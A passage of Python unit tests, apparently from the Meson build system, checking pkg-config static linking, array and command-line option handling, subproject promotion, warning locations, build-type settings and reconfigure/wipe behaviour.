if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that the we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build
Also test that it's not a hard error to have unsatisfiable library deps
since system libraries -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix(), '-DLIBFOO']
# pkg-config and pkgconf does not respect the same order
self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs))
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('102 subdir parse error', os.path.join('subdir', 'meson.build')),
('103 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_cs_compiler(MachineChoice.HOST)
langs.append('cs')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_java_compiler(MachineChoice.HOST)
langs.append('java')
except EnvironmentException:
pass
try:
env.detect_cuda_compiler(MachineChoice.HOST)
langs.append('cuda')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
try:
env.detect_objcpp_compiler(MachineChoice.HOST)
langs.append('objcpp')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
if not is_windows():
try:
env.detect_rust_compiler(MachineChoice.HOST)
langs.append('rust')
except EnvironmentException:
pass
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp', 'd'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
elif lang in ('java'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
f.write('public class Foo { public static void main() {} }')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
# this tests needs to use shared libraries to test the path resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_builddir
self.builddir = initial_installdir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
# It is not an error to set wrong option for unknown subprojects or
# language because we don't have control on which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
self.wipe()
# Setting a 2nd time the same option should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
# Ignore KeyError, it happens on CI for compilers that does not
# support b_sanitize. We have to test with a base option because
# they used to fail this test with Meson 0.46 an earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
of = open(mfile, 'w')
of.write("project('foobar', 'c')\n")
of.close()
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
# Command-line parsing of buildtype settings should be the same as
# setting with `meson configure`.
#
# Setting buildtype should set optimization/debug
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting optimization/debug should set buildtype
self.new_builddir()
self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting both buildtype and debug on the command-line should work, and
# should warn not to do that. Also test that --debug is parsed as -Ddebug=true
self.new_builddir()
out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug'])
self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = ['{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
with Path(self.builddir):
self.init(testdir, extra_args=['--wipe'])
